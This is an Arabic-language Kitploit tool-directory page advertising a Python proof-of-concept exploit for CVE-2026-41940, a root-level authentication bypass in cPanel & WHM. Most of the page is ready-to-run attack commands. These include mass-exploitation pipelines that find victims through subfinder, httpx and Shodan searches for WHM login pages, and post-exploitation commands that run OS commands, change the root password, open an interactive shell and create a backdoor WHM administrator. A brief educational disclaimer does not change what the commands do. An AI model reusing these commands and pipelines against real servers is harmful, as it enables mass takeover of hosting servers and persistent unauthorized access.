Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/yasouxken/cve-2026-41940-poc
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالمصادقةالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHub
منذ 4س 46دلم تتم المراجعة بعد
yasouxken/cve-2026-41940-poc

cve-2026-41940-PoC

أداة PoC بلغة Python تستغل CVE-2026-41940، وهو تجاوز للمصادقة في cPanel & WHM يتيح وصولاً غير مصادق عليه إلى WHM بمستوى root، مع أوامر فحص وأوامر shell لما بعد الاستغلال.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-41940

⚠ هذه الأداة أُنشئت لغرض تعليمي أو لبرامج مكافآت الثغرات فقط. يُحظر تمامًا الاستخدام غير المصرح به خارج البيئات المُتحكَّم بها.

الوصف

أداة لاستغلال CVE-2026-41940، وهي تجاوز حرج للمصادقة في cPanel & WHM (CVSS 10.0)، تتيح للمهاجمين غير المُصادَق عليهم الحصول على وصول WHM بمستوى root عبر حقن تسلسلات CRLF في ملفات الجلسة على جانب الخادم من خلال ترويسة Authorization — دون الحاجة إلى بيانات اعتماد.

كيف تعمل

يُستغَل CVE-2026-41940، بعبارات عامة، من خلال خلل في كيفية تعامل النظام مع جلسات المصادقة في cPanel/WHM. يبدأ الهجوم عادةً بطلب عادي إلى واجهة تسجيل الدخول، حيث يقوم التطبيق بتهيئة جلسة قبل الأوان قبل التحقق الكامل من بيانات اعتماد المستخدم. وبسبب المعالجة غير السليمة للمدخلات المتعلقة بالجلسة، يمكن لبعض البنى المُصمَّمة أو غير المتوقعة للمدخلات أن تُغيّر كيفية تخزين بيانات الجلسة أو تفسيرها من قِبل الخادم.

الإصدارات المتأثرة

الإصدارقابل للاستغلالمُصحَّح
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

التثبيت (Windows/Mac OS)🔄

root@kitploit:~
git clone https://github.com/yasouxken/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows 
python cve.py
# MacOS/Linux
python3 cve.py

كيفية الاستخدام

تتوقع الأداة تحديد نطاق هدف.

وضع الهدف الواحد:

root@kitploit:~
python cve.py -u https://target1.com:2083

يمكنك أيضًا الفحص من ملف target.txt (أنشئه):

root@kitploit:~
python cve.py -l target.txt -t 50 -o result.json

الفحص الأساسي:

الأوامر المتاحة:

root@kitploit:~
python cve.py -u https://victim1.com:2083 # فحص هدف واحد
python cve.py info -u https://victim1.com:2083 # يسترجع معلومات النظام (الإصدار، الحمل، استخدام القرص).
python cve.py host -u https://victim1.com:2083 # يسترجع اسم المضيف للخادم الهدف.

إجراءات ما بعد الاستغلال

root@kitploit:~
# سرد جميع الحسابات على الخادم
python cve.py list -u https://target.com:2087

# أمر نظام التشغيل
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"

# الحصول على معلومات الخادم (اسم المضيف، القرص، مضيف MySQL)
python cve.py info -u https://target.com:2087

# تغيير كلمة مرور root
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# صدفة WHM تفاعلية
python cve.py shell -u https://target.com:2087

خطوط الأنابيب

root@kitploit:~
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python cve.py scan -t 40 -o results.json

# من قائمة النطاق
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python cve.py scan -t 30 -o results.json

# نتائج Shodan
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python cve.py -t 30 -o shodan_results.json

# مصادر متعددة مجتمعة
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python cve.py -t 20 --action list

وضع صدفة WHM

بعد تنفيذ ناجح، يمكنك فتح صدفة WHM تفاعلية:

root@kitploit:~
python cve.py shell -u

جميع أوامر الصدفة

الأمرالوصف
idعرض معرّف المستخدم
hostnameالحصول على اسم مضيف الخادم
accountsسرد جميع حسابات المستخدمين
infoالحمل، القرص، مضيف MySQL، الإصدار
cat <path>قراءة محتوى ملف
exec <cmd>تنفيذ أمر نظام التشغيل
newadmin <user> <pass>إنشاء مسؤول WHM خلفي
passwd <pass>تغيير كلمة مرور root
l [path]سرد محتويات الدليل
helpعرض جميع الأوامر
exitالخروج من وضع الصدفة

مرجع CLI

root@kitploit:~
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] 

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors

إخلاء المسؤولية

⚠ هذه الأداة أُنشئت لغرض تعليمي أو لبرامج مكافآت الثغرات فقط. يُحظر تمامًا الاستخدام غير المصرح به خارج البيئات المُتحكَّم بها.

تنزيل الأداة